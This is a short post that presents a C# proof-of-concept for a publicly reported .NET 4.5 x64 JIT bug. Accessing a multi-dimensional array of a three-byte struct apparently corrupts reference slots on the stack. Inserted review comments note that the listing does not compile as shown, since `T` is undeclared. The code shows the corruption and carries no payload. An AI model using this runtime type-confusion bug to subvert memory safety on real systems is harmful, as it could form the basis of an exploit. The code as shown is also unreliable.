I did not discover this vulnerability (Alon Fliess filed the public bug report), but I decided to investigate it and write a PoC exploit:
using System;
using System.Runtime.CompilerServices;
/// <summary>
/// Element type for the multi-dimensional array used by the PoC: three
/// bytes, i.e. a value type with an odd (non-power-of-two) size.
/// </summary>
struct Foo
{
    byte b1;
    byte b2;
    byte b3;
}
/// <summary>Marker reference type with no members; only its identity matters.</summary>
class U1
{
}
/// <summary>Second marker reference type, distinct from U1 so the two can be told apart.</summary>
class U2
{
}
/// <summary>
/// Bundle of three reference-typed slots that the PoC keeps in a local variable
/// (and therefore on the stack) across the array access in Program.Get.
/// </summary>
struct StackFields
{
    /// <summary>Holds an object reference (the PoC stores a U1 here).</summary>
    internal object f1;
    /// <summary>Holds a U1 reference.</summary>
    internal U1 f2;
    /// <summary>Holds a U2 reference; this is the slot the PoC prints afterwards.</summary>
    internal U2 f3;
}
// PoC driver for the publicly reported .NET 4.5 x64 JIT bug described above.
// The exact statement order and layout in this class are part of the repro and
// should not be reordered or restyled.
class Program {
// Two instance fields; Get copies one into the other, which appears to exist only
// to force a field access on `this` at that point in the method — presumably part
// of the code layout the PoC depends on; confirm against the original report.
long field1;
long field2;
// Entry point: builds a 1x1 multi-dimensional array of Foo and hands it to Get.
static void Main() {
new Program().Get(new Foo[1, 1]);
}
// NoInlining keeps Get as its own JIT-compiled method, so the code under test is
// not folded into Main.
[MethodImpl(MethodImplOptions.NoInlining)]
// NOTE(review): `T` is not declared anywhere in this listing, so it does not
// compile as shown. It looks like a generic method, `object Get<T>(T[,] arr)`,
// whose `<T>` was stripped as markup by the page renderer — confirm against the
// original post before building.
object Get(T[,] arr) {
// Three reference-typed locals kept live on the stack across the array access.
StackFields fields = new StackFields();
fields.f1 = new U1();
fields.f2 = new U1();
fields.f3 = new U2();
arr.ToString();
// Reads the single element of the multi-dimensional array (boxed when the
// element type is a value type, as with Foo).
object v = arr[0, 0];
field2 = field1;
// Prints fields.f3. Presumably the demonstration is that, on the affected runtime
// (see the requirements below), this no longer prints a U2 — i.e. the stack slot
// was disturbed by the array access — confirm against the bug report.
Console.WriteLine(fields.f3);
return v;
}
}
This requires .NET 4.5 on x64, and the program must be built and run in release mode.